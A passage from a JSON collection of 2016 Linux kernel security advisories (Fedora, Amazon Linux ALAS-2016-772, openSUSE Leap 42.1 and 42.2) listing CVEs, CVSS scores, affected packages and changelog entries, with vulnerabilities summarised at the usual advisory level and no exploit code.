"2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630", "CVE-2016-8645", "CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel meta package ", "modified": "2016-11-24T08:29:52", "published": "2016-11-24T08:29:52", "id": "FEDORA:D89B960F8CA9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.8.8-100.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel meta package ", "modified": "2016-11-07T23:34:12", "published": "2016-11-07T23:34:12", "id": "FEDORA:3D4286087E43", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.8.6-201.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630"], "description": "The kernel meta package ", "modified": "2016-11-17T02:27:30", "published": "2016-11-17T02:27:30", "id": "FEDORA:8EB6260D0217", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.8.7-200.fc24", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630"], "description": "The kernel meta package ", "modified": "2016-11-19T22:23:25", "published": "2016-11-19T22:23:25", "id": "FEDORA:E2FD36125E3E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.8.7-300.fc25", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-9083", "CVE-2016-8645"], "description": "**Issue Overview:**\n\n[CVE-2016-8645 __](<https://access.redhat.com/security/cve/CVE-2016-8645>) kernel: a BUG() statement can be hit in net/ipv4/tcp_input.c \nIt was discovered that the Linux kernel since 3.6-rc1 with net.ipv4.tcp_fastopen; set to 1 can hit BUG() statement in tcp_collapse() function after making a number of certain syscalls leading to a possible system crash.\n\n[CVE-2016-8655 __](<https://access.redhat.com/security/cve/CVE-2016-8655>) kernel: Race condition in packet_set_ring leads to use after free \nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.\n\n[CVE-2016-9083 __](<https://access.redhat.com/security/cve/CVE-2016-9083>) kernel: State machine confusion bug in vfio driver leading to memory corruption \nA flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution.\n\n[CVE-2016-9084 __](<https://access.redhat.com/security/cve/CVE-2016-9084>) kernel: Integer overflow when using kzalloc in vfio driver \nThe use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with [CVE-2016-9083 __](<https://access.redhat.com/security/cve/CVE-2016-9083>) may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-debuginfo-common-i686-4.4.35-33.55.amzn1.i686 \n perf-debuginfo-4.4.35-33.55.amzn1.i686 \n kernel-tools-4.4.35-33.55.amzn1.i686 \n perf-4.4.35-33.55.amzn1.i686 \n kernel-4.4.35-33.55.amzn1.i686 \n kernel-tools-debuginfo-4.4.35-33.55.amzn1.i686 \n kernel-headers-4.4.35-33.55.amzn1.i686 \n kernel-debuginfo-4.4.35-33.55.amzn1.i686 \n kernel-tools-devel-4.4.35-33.55.amzn1.i686 \n kernel-devel-4.4.35-33.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.35-33.55.amzn1.noarch \n \n src: \n kernel-4.4.35-33.55.amzn1.src \n \n x86_64: \n kernel-tools-4.4.35-33.55.amzn1.x86_64 \n perf-debuginfo-4.4.35-33.55.amzn1.x86_64 \n kernel-headers-4.4.35-33.55.amzn1.x86_64 \n kernel-tools-devel-4.4.35-33.55.amzn1.x86_64 \n perf-4.4.35-33.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.35-33.55.amzn1.x86_64 \n kernel-4.4.35-33.55.amzn1.x86_64 \n kernel-devel-4.4.35-33.55.amzn1.x86_64 \n kernel-debuginfo-4.4.35-33.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.35-33.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2016-12-06T23:44:00", "published": "2016-12-06T23:44:00", "id": "ALAS-2016-772", "href": "https://alas.aws.amazon.com/ALAS-2016-772.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-12-08T17:30:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-9794", "CVE-2016-8633", "CVE-2016-8655", "CVE-2016-9084", "CVE-2015-8962", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-9178", "CVE-2015-8963", "CVE-2016-9083", "CVE-2015-8956", "CVE-2016-8646", "CVE-2016-7913", "CVE-2016-7042"], "edition": 1, "description": "The openSUSE Leap 42.1 kernel was updated to 4.1.36 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012754).\n - CVE-2016-9794: A use-after-free in ALSA pcm could lead to crashes or\n allowed local users to potentially gain privileges (bsc#1013533).\n - CVE-2015-8962: Double free vulnerability in the sg_common_write function\n in drivers/scsi/sg.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (memory corruption and system\n crash) by detaching a device during an SG_IO ioctl call (bnc#1010501).\n - CVE-2016-9178: The __get_user_asm_ex macro in\n arch/x86/include/asm/uaccess.h in the Linux kernel did not initialize a\n certain integer variable, which allowed local users to obtain sensitive\n information from kernel stack memory by triggering failure of a\n get_user_ex call (bnc#1008650).\n - CVE-2016-7913: The xc2028_set_config function in\n drivers/media/tuners/tuner-xc2028.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service (use-after-free)\n via vectors involving omission of the firmware name from a certain data\n structure (bnc#1010478).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bnc#1011685).\n - CVE-2015-8963: Race condition in kernel/events/core.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (use-after-free) by leveraging incorrect handling of an swevent\n data structure during a CPU unplug operation (bnc#1010502).\n - CVE-2015-8964: The tty_set_termios_ldisc function in\n drivers/tty/tty_ldisc.c in the Linux kernel allowed local users to\n obtain sensitive information from kernel memory by reading a tty data\n structure (bnc#1010507).\n - CVE-2016-8646: The hash_accept function in crypto/algif_hash.c in the\n Linux kernel allowed local users to cause a denial of service (OOPS) by\n attempting to trigger use of in-kernel hash algorithms for a socket that\n has received zero bytes of data (bnc#1010150).\n - CVE-2016-8633: drivers/firewire/net.c in the Linux kernel in certain\n unusual hardware configurations, allowed remote attackers to execute\n arbitrary code via crafted fragmented packets (bnc#1008833).\n - CVE-2016-8630: The x86_decode_insn function in arch/x86/kvm/emulate.c in\n the Linux kernel, when KVM is enabled, allowed local users to cause a\n denial of service (host OS crash) via a certain use of a ModR/M byte in\n an undefined instruction (bnc#1009222).\n - CVE-2016-9083: drivers/vfio/pci/vfio_pci.c in the Linux kernel allowed\n local users to bypass integer overflow checks, and cause a denial of\n service (memory corruption) or have unspecified other impact, by\n leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS\n ioctl call, aka a "state machine confusion bug (bnc#1007197).\n - CVE-2016-9084: drivers/vfio/pci/vfio_pci_intrs.c in the Linux kernel\n misuses the kzalloc function, which allowed local users to cause a\n denial of service (integer overflow) or have unspecified other impact by\n leveraging access to a vfio PCI device file (bnc#1007197).\n - CVE-2016-7042: The proc_keys_show function in security/keys/proc.c in\n the Linux kernel through 4.8.2, when the GNU Compiler Collection (gcc)\n stack protector is enabled, uses an incorrect buffer size for certain\n timeout data, which allowed local users to cause a denial of service\n (stack memory corruption and panic) by reading the /proc/keys file\n (bnc#1004517).\n - CVE-2016-7097: The filesystem implementation in the Linux kernel\n preserves the setgid bit during a setxattr call, which allowed local\n users to gain group privileges by leveraging the existence of a setgid\n program with restrictions on execute permissions (bnc#995968).\n - CVE-2015-8956: The rfcomm_sock_bind function in\n net/bluetooth/rfcomm/sock.c in the Linux kernel allowed local users to\n obtain sensitive information or cause a denial of service (NULL pointer\n dereference) via vectors involving a bind system call on a Bluetooth\n RFCOMM socket (bnc#1003925).\n\n The following non-security bugs were fixed:\n\n - ata: ahci_xgene: dereferencing uninitialized pointer in probe\n (bsc#1006580).\n - blacklist.conf: add some commits (bsc#1006580)\n - bna: Add synchronization for tx ring (bsc#993739).\n - bonding: set carrier off for devices created through netlink\n (bsc#999577).\n - btrfs: deal with duplicates during extent_map insertion in\n btrfs_get_extent (bsc#1001171).\n - btrfs: deal with existing encompassing extent map in btrfs_get_extent()\n (bsc#1001171).\n - btrfs: fix extent tree corruption due to relocation (bsc#990384).\n - btrfs: fix races on root_log_ctx lists (bsc#1007653).\n - ext4: fix data exposure after a crash (bsc#1012876).\n - ext4: fix reference counting bug on block allocation error (bsc#1012876).\n - gre: Disable segmentation offloads w/ CSUM and we are encapsulated via\n FOU (bsc#1001486).\n - gro: Allow tunnel stacking in the case of FOU/GUE (bsc#1001486).\n - ipv6: send NEWLINK on RA managed/otherconf changes (bsc#934067).\n - ipv6: send only one NEWLINK when RA causes changes (bsc#934067).\n - isofs: Do not return EACCES for unknown filesystems (bsc#1012876).\n - jbd2: fix checkpoint list cleanup (bsc#1012876).\n - jbd2: Fix unreclaimed pages after truncate in data=journal mode\n (bsc#1010909).\n - locking/static_key: Fix concurrent static_key_slow_inc() (bsc#1006580).\n - mmc: Fix kabi breakage of mmc-block in 4.1.36 (stable-4.1.36).\n - posix_acl: Added fix for f2fs.\n - Revert "kbuild: add -fno-PIE" (stable-4.1.36).\n - Revert "x86/mm: Expand the exception table logic to allow new handling\n options" (stable-4.1.36).\n - tunnels: Remove encapsulation offloads on decap (bsc#1001486).\n - usbhid: add ATEN CS962 to list of quirky devices (bsc#1007615).\n - vmxnet3: Wake queue from reset work (bsc#999907).\n\n", "modified": "2016-12-08T15:07:13", "published": "2016-12-08T15:07:13", "id": "OPENSUSE-SU-2016:3058-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00027.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-08T13:30:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9794", "CVE-2016-8655", "CVE-2016-9084", "CVE-2016-7917", "CVE-2016-8666", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8632", "CVE-2015-1350", "CVE-2016-9083", "CVE-2016-7913", "CVE-2016-7039", "CVE-2016-7042"], "edition": 1, "description": "The openSUSE Leap 42.2 kernel was updated to 4.4.36 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2015-1350: The VFS subsystem in the Linux kernel 3.x provides an\n incomplete set of requirements for setattr operations that\n underspecifies removing extended privilege attributes, which allowed\n local users to cause a denial of service (capability stripping) via a\n failed invocation of a system call, as demonstrated by using chown to\n remove a capability from the ping or Wireshark dumpcap program\n (bnc#914939).\n - CVE-2015-8964: The tty_set_termios_ldisc function in\n drivers/tty/tty_ldisc.c in the Linux kernel allowed local users to\n obtain sensitive information from kernel memory by reading a tty data\n structure (bnc#1010507).\n - CVE-2016-7042: The proc_keys_show function in security/keys/proc.c in\n the Linux kernel through 4.8.2, when the GNU Compiler Collection (gcc)\n stack protector is enabled, uses an incorrect buffer size for certain\n timeout data, which allowed local users to cause a denial of service\n (stack memory corruption and panic) by reading the /proc/keys file\n (bnc#1004517).\n - CVE-2016-7913: The xc2028_set_config function in\n drivers/media/tuners/tuner-xc2028.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service (use-after-free)\n via vectors involving omission of the firmware name from a certain data\n structure (bnc#1010478).\n - CVE-2016-7917: The nfnetlink_rcv_batch function in\n net/netfilter/nfnetlink.c in the Linux kernel did not check whether a\n batch message's length field is large enough, which allowed local users\n to obtain sensitive information from kernel memory or cause a denial of\n service (infinite loop or out-of-bounds read) by leveraging the\n CAP_NET_ADMIN capability (bnc#1010444).\n - CVE-2016-8632: The tipc_msg_build function in net/tipc/msg.c in the\n Linux kernel did not validate the relationship between the minimum\n fragment length and the maximum packet size, which allowed local users\n to gain privileges or cause a denial of service (heap-based buffer\n overflow) by leveraging the CAP_NET_ADMIN capability (bnc#1008831).\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012754).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bnc#1001486).\n - CVE-2016-9083: drivers/vfio/pci/vfio_pci.c in the Linux kernel allowed\n local users to bypass integer overflow checks, and cause a denial of\n service (memory corruption) or have unspecified other impact, by\n leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS\n ioctl call, aka a "state machine confusion bug (bnc#1007197).\n - CVE-2016-9084: drivers/vfio/pci/vfio_pci_intrs.c in the Linux kernel\n misuses the kzalloc function, which allowed local users to cause a\n denial of service (integer overflow) or have unspecified other impact by\n leveraging access to a vfio PCI device file (bnc#1007197).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bnc#1011685).\n - CVE-2016-9794: A use-after-free in alsa pcm could lead to crashes or\n allowed local users to potentially gain privileges (bsc#1013533).\n\n The following non-security bugs were fixed:\n\n - acpi / pad: do not register acpi_pad driver if running as Xen dom0\n (bnc#995278).\n - Add power key support for PMIcs which are already included in the\n configs (boo#1012477). Arm64 already has these so no need to patch it.\n - alsa: hda - Bind with i915 only when Intel graphics is present\n (bsc#1012767).\n - alsa: hda - Clear the leftover component assignment at\n snd_hdac_i915_exit() (bsc#1012767).\n - alsa: hda - Degrade i915 binding failure message (bsc#1012767).\n - alsa: hda - Fix yet another i915 pointer leftover in error path\n (bsc#1012767).\n - alsa: hda - Gate the mic jack on HP Z1 Gen3 AiO (bsc#1004365).\n - arm64/efi: Enable runtime call flag checking (bsc#1005745).\n - arm64/efi: Move to generic {__,}efi_call_virt() (bsc#1005745).\n - arm64: Refuse to install 4k kernel on 64k system\n - arm64: Update config files. Disable CONFIG_IPMI_SI_PROBE_DEFAULTS\n (bsc#1006576)\n - arm: bcm2835: add CPU node for ARM core (boo#1012094).\n - arm: bcm2835: Split the DT for peripherals from the DT for the CPU\n (boo#1012094).\n - asoc: cht_bsw_rt5645: Enable jack detection (bsc#1010690).\n - asoc: cht_bsw_rt5645: Fix writing to string literal (bsc#1010690).\n - asoc: cht_bsw_rt5672: Use HID translation unit (bsc#1010690).\n - asoc: intel: add function stub when ACPI is not enabled (bsc#1010690).\n - asoc: Intel: add fw name to common dsp context (bsc#1010690).\n - asoc: Intel: Add missing 10EC5672 ACPI ID matching for Cherry Trail\n (bsc#1010690).\n - asoc: Intel: Add module tags for common match module (bsc#1010690).\n - asoc: Intel: add NULL test (bsc#1010690).\n - asoc: Intel: Add quirks for MinnowBoard MAX (bsc#1010690).\n - asoc: Intel: Add surface3 entry in CHT-RT5645 machine (bsc#1010690).\n - asoc: Intel: Atom: add 24-bit support for media playback and capture\n (bsc#1010690).\n - asoc: Intel: Atom: add deep buffer definitions for atom platforms\n (bsc#1010690).\n - asoc: Intel: Atom: add definitions for modem/SSP0 interface\n (bsc#1010690).\n - asoc: Intel: Atom: Add quirk for Surface 3 (bsc#1010690).\n - asoc: Intel: Atom: add support for CHT w/ RT5640 (bsc#1010690).\n - asoc: Intel: Atom: Add support for HP ElitePad 1000 G2 (bsc#1010690).\n - asoc: Intel: Atom: add support for RT5642 (bsc#1010690).\n - asoc: Intel: Atom: add terminate entry for dmi_system_id tables\n (bsc#1010690).\n - asoc: Intel: Atom: auto-detection of Baytrail-CR (bsc#1010690).\n - asoc: Intel: Atom: clean-up compressed DAI definition (bsc#1010690).\n - asoc: Intel: atom: enable configuration of SSP0 (bsc#1010690).\n - asoc: Intel: atom: fix 0-day warnings (bsc#1010690).\n - asoc: Intel: Atom: fix boot warning (bsc#1010690).\n - asoc: Intel: Atom: Fix message handling during drop stream (bsc#1010690).\n - asoc: Intel: atom: fix missing breaks that would cause the wrong\n operation to execute (bsc#1010690).\n - asoc: Intel: Atom: fix regression on compress DAI (bsc#1010690).\n - asoc: Intel: Atom: flip logic for gain Switch (bsc#1010690).\n - asoc: Intel: atom: Make some messages to debug level (bsc#1010690).\n - asoc: Intel: Atom: move atom driver to common acpi match (bsc#1010690).\n - asoc: Intel: atom: statify cht_quirk (bsc#1010690).\n - asoc: Intel: boards: add DEEP_BUFFER support for BYT/CHT/BSW\n (bsc#1010690).\n - asoc: Intel: boards: align pin names between byt-rt5640 drivers\n (bsc#1010690).\n - asoc: Intel: boards: merge DMI-based quirks in bytcr-rt5640 driver\n (bsc#1010690).\n - asoc: Intel: boards: start merging byt-rt5640 drivers (bsc#1010690).\n - asoc: Intel: bytcr_rt56040: additional routing quirks (bsc#1010690).\n - asoc: Intel: bytcr-rt5640: add Asus T100TAF quirks (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: add IN3 map (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: add MCLK support (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: Add quirk for Teclast X98 Air 3G tablet\n (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: add SSP2_AIF2 routing (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: change quirk position (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: default routing and quirks on Baytrail-CR\n (bsc#1010690).\n - asoc: Intel: bytcr-rt5640: enable ASRC (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: enable differential mic quirk (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: fix dai/clock setup for SSP0 routing\n (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: fixup DAI codec_name with HID (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: log quirks (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: quirk for Acer Aspire SWS-012 (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: quirk for mono speaker (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: set SSP to I2S mode 2ch (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: use HID translation util (bsc#1010690).\n - asoc: Intel: cht: fix uninit variable warning (bsc#1010690).\n - asoc: Intel: common: add translation from HID to codec-name\n (bsc#1010690).\n - asoc: Intel: common: filter ACPI devices with _STA return value\n (bsc#1010690).\n - asoc: Intel: common: increase the loglevel of "FW Poll Status"\n (bsc#1010690).\n - asoc: Intel: Create independent acpi match module (bsc#1010690).\n - asoc: intel: Fix sst-dsp dependency on dw stuff (bsc#1010690).\n - asoc: Intel: Keep building old baytrail machine drivers (bsc#1010690).\n - asoc: Intel: Load the atom DPCM driver only (bsc#1010690).\n - asoc: intel: make function stub static (bsc#1010690).\n - asoc: Intel: Move apci find machine routines (bsc#1010690).\n - asoc: intel: Replace kthread with work (bsc#1010690).\n - asoc: Intel: Skylake: Always acquire runtime pm ref on unload\n (bsc#1005917).\n - asoc: Intel: sst: fix sst_memcpy32 wrong with non-4x bytes issue\n (bsc#1010690).\n - asoc: rt5640: add ASRC support (bsc#1010690).\n - asoc: rt5640: add internal clock source support (bsc#1010690).\n - asoc: rt5640: add master clock handling for rt5640 (bsc#1010690).\n - asoc: rt5640: add supplys for dac power (bsc#1010690).\n - asoc: rt5640: remove unused variable (bsc#1010690).\n - asoc: rt5640: Set PLL src according to source (bsc#1010690).\n - asoc: rt5645: add DAC1 soft volume func control (bsc#1010690).\n - asoc: rt5645: Add dmi_system_id "Google Setzer" (bsc#1010690).\n - asoc: rt5645: extend delay time for headphone pop noise (bsc#1010690).\n - asoc: rt5645: fix reg-2f default value (bsc#1010690).\n - asoc: rt5645: improve headphone pop when system resumes from S3\n (bsc#1010690).\n - asoc: rt5645: improve IRQ reaction time for HS button (bsc#1010690).\n - asoc: rt5645: merge DMI tables of google projects (bsc#1010690).\n - asoc: rt5645: patch reg-0x8a (bsc#1010690).\n - asoc: rt5645: polling jd status in all conditions (bsc#1010690).\n - asoc: rt5645: Separate regmap for rt5645 and rt5650 (bsc#1010690).\n - asoc: rt5645: set RT5645_PRIV_INDEX as volatile (bsc#1010690).\n - asoc: rt5645: use polling to support HS button (bsc#1010690).\n - asoc: rt5645: Use the mod_delayed_work instead of the queue_delayed_work\n and cancel_delayed_work_sync (bsc#1010690).\n - asoc: rt5670: Add missing 10EC5072 ACPI ID (bsc#1010690).\n - asoc: rt5670: Enable Braswell platform workaround for Dell Wyse 3040\n (bsc#1010690).\n - asoc: rt5670: fix HP Playback Volume control (bsc#1010690).\n - asoc: rt5670: patch reg-0x8a (bsc#1010690).\n - blacklist.conf: Remove intel_pstate potential patch that SLE 12 SP2 The\n code layout upstream that motivated this patch is completely different\n to what is in SLE 12 SP2 as schedutil was not backported.\n - bna: Add synchronization for tx ring (bsc#993739).\n - btrfs: allocate root item at snapshot ioctl time (bsc#1012452).\n - btrfs: better packing of btrfs_delayed_extent_op (bsc#1012452).\n - btrfs: Check metadata redundancy on balance (bsc#1012452).\n - btrfs: clean up an error code in btrfs_init_space_info() (bsc#1012452).\n - btrfs: cleanup, stop casting for extent_map->lookup everywhere\n (bsc#1012452).\n - btrfs: cleanup, use enum values for btrfs_path reada (bsc#1012452).\n - btrfs: deal with duplicates during extent_map insertion in\n btrfs_get_extent (bsc#1001171).\n - btrfs: deal with existing encompassing extent map in btrfs_get_extent()\n (bsc#1001171).\n - btrfs: do an allocation earlier during snapshot creation (bsc#1012452).\n - btrfs: do not create or leak aliased root while cleaning up orphans\n (bsc#994881).\n - btrfs: do not leave dangling dentry if symlink creation failed\n (bsc#1012452).\n - btrfs: do not use slab cache for struct btrfs_delalloc_work\n (bsc#1012452).\n - btrfs: drop duplicate prefix from scrub workqueues (bsc#1012452).\n - btrfs: drop unused parameter from lock_extent_bits (bsc#1012452).\n - btrfs: Enhance chunk validation check (bsc#1012452).\n - btrfs: Enhance super validation check (bsc#1012452).\n - btrfs: Ensure proper sector alignment for btrfs_free_reserved_data_space\n (bsc#1005666).\n - btrfs: Expoert and move leaf/subtree qgroup helpers to qgroup.c\n (bsc983087, bsc986255).\n - btrfs: fix incremental send failure caused by balance (bsc#985850).\n - btrfs: fix locking bugs when defragging leaves (bsc#1012452).\n - btrfs: fix memory leaks after transaction is aborted (bsc#1012452).\n - btrfs: fix output of compression message in btrfs_parse_options()\n (bsc#1012452).\n - btrfs: fix race between free space endio workers and space cache\n writeout (bsc#1012452).\n - btrfs: fix races on root_log_ctx lists (bsc#1007653).\n - btrfs: fix race when finishing dev replace leading to transaction abort\n (bsc#1012452).\n - btrfs: fix relocation incorrectly dropping data references (bsc#990384).\n - btrfs: fix typo in log message when starting a balance (bsc#1012452).\n - btrfs: fix unprotected list operations at btrfs_write_dirty_block_groups\n (bsc#1012452).\n - btrfs: handle quota reserve failure properly (bsc#1005666).\n - btrfs: make btrfs_close_one_device static (bsc#1012452).\n - btrfs: make clear_extent_bit helpers static inline (bsc#1012452).\n - btrfs: make clear_extent_buffer_uptodate return void (bsc#1012452).\n - btrfs: make end_extent_writepage return void (bsc#1012452).\n - btrfs: make extent_clear_unlock_delalloc return void (bsc#1012452).\n - btrfs: make extent_range_clear_dirty_for_io return void (bsc#1012452).\n - btrfs: make extent_range_redirty_for_io return void (bsc#1012452).\n - btrfs: make lock_extent static inline (bsc#1012452).\n - btrfs: make set_extent_bit helpers static inline (bsc#1012452).\n - btrfs: make set_extent_buffer_uptodate return void (bsc#1012452).\n - btrfs: make set_range_writeback return void (bsc#1012452).\n - btrfs: preallocate path for snapshot creation at ioctl time\n (bsc#1012452).\n - btrfs: put delayed item hook into inode (bsc#1012452).\n - btrfs: qgroup: Add comments explaining how btrfs qgroup works\n (bsc983087, bsc986255).\n - btrfs: qgroup: Fix qgroup data leaking by using subtree tracing\n (bsc983087, bsc986255).\n - btrfs: qgroup: Rename functions to make it follow reserve, trace,\n account steps (bsc983087, bsc986255).\n - btrfs: remove a trivial helper btrfs_set_buffer_uptodate (bsc#1012452).\n - btrfs: remove root_log_ctx from ctx list before btrfs_sync_log returns\n (bsc#1007653).\n - btrfs: remove unused inode argument from uncompress_inline()\n (bsc#1012452).\n - btrfs: remove wait from struct btrfs_delalloc_work (bsc#1012452).\n - btrfs: send, do not bug on inconsistent snapshots (bsc#985850).\n - btrfs: sink parameter wait to btrfs_alloc_delalloc_work (bsc#1012452).\n - btrfs: Support convert to -d dup for btrfs-convert (bsc#1012452).\n - btrfs: Update\n patches.suse/btrfs-8401-fix-qgroup-accounting-when-creating-snap.patch\n (bsc#972993).\n - btrfs: use GFP_KERNEL for allocations in ioctl handlers (bsc#1012452).\n - btrfs: use GFP_KERNEL for allocations of workqueues (bsc#1012452).\n - btrfs: use GFP_KERNEL for xattr and acl allocations (bsc#1012452).\n - btrfs: use smaller type for btrfs_path locks (bsc#1012452).\n - btrfs: use smaller type for btrfs_path lowest_level (bsc#1012452).\n - btrfs: use smaller type for btrfs_path reada (bsc#1012452).\n - btrfs: verbose error when we find an unexpected item in sys_array\n (bsc#1012452).\n - config: i2c: Enable CONFIG_I2C_DESIGNWARE_PLATFORM and *_BAYTRAIL\n (bsc#1010690) Realtek codecs on CHT platform require this i2c bus driver.\n - config: select new CONFIG_SND_SOC_INTEL_SST_* helpers\n - config: Update config files. (boo#1012094)\n - config: Update config files (bsc#1009454) Do not set\n CONFIG_EFI_SECURE_BOOT_SECURELEVEL in x86_64/default and x86_64/debug.\n We do not need to set CONFIG_EFI_SECURE_BOOT_SECURELEVEL in openSUSE\n kernel because openSUSE does not enable kernel module signature check\n (bsc#843661). Without kernel module signature check, the root account is\n allowed to load arbitrary kernel module to kernel space. Then lock\n functions by securelevel is pointless.\n - cxgbi: fix uninitialized flowi6 (bsc#963904 FATE#320115).\n - Delete\n patches.fixes/Add-a-missed-complete-in-iscsit_close_connection.patch.\n remove patch Add-a-missed-complete-in-iscsit_close_connection.patch add\n bsc#997807 bsc#992555 in patch-4.4.27-28 references\n - dell-laptop: Fixate rfkill work on CPU#0 (bsc#1004052).\n - dell-wmi: Check if Dell WMI descriptor structure is valid (bsc#1004052).\n - dell-wmi: Clean up hotkey table size check (bsc#1004052).\n - dell-wmi: Ignore WMI event code 0xe045 (bsc#1004052).\n - dell-wmi: Improve unknown hotkey handling (bsc#1004052).\n - dell-wmi: Process only one event on devices with interface version 0\n (bsc#1004052).\n - dell-wmi: Stop storing pointers to DMI tables (bsc#1004052).\n - dell-wmi: Support new hotkeys on the XPS 13 9350 (Skylake) (bsc#1004052).\n - dell_wmi: Use a C99-style array for bios_to_linux_keycode (bsc#1004052).\n - drm/i915: Add missing ring_mask to Pineview (bsc#1005917).\n - drm/i915: Calculate watermark related members in the crtc_state, v4\n (bsc#1011176).\n - drm/i915/ivb: Move WaCxSRDisabledForSpriteScaling w/a to atomic check\n (bsc#1011176).\n - drm/i915: Move disable_cxsr to the crtc_state (bsc#1011176).\n - drm/mgag200: fix error return code in mgag200fb_create() (bsc#1005917).\n - drm/radeon: Also call cursor_move_locked when the cursor size changes\n (bsc#1000433).\n - drm/radeon: Always store CRTC relative radeon_crtc->cursor_x/y values\n (bsc#1000433).\n - drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on\n (bsc#998054)\n - drm/radeon: Hide the HW cursor while it's out of bounds (bsc#1000433).\n - drm/radeon: Switch to drm_vblank_on/off (bsc#998054).\n - Drop kernel-obs-qa-xen unconditionally (bsc#1010040) The IBS cannot\n build it, even if there is a xen-capable kernel-obs-build.\n - edac/mce_amd: Add missing SMCA error descriptions (fate#320474,\n bsc#1013700).\n - edac/mce_amd: Use SMCA prefix for error descriptions arrays\n (fate#320474, bsc#1013700).\n - efi/runtime-wrappers: Add {__,}efi_call_virt() templates (bsc#1005745).\n - efi/runtime-wrappers: Detect firmware IRQ flag corruption (bsc#1005745).\n - efi/runtime-wrappers: Remove redundant #ifdefs (bsc#1005745).\n - ext4: fix data exposure after a crash (bsc#1012829).\n - fs, block: force direct-I/O for dax-enabled block devices (bsc#1012992).\n - fs/cifs: cifs_get_root shouldn't use path with tree name (bsc#963655,\n bsc#979681).\n - fs/cifs: Compare prepaths when comparing superblocks (bsc#799133).\n - fs/cifs: Fix memory 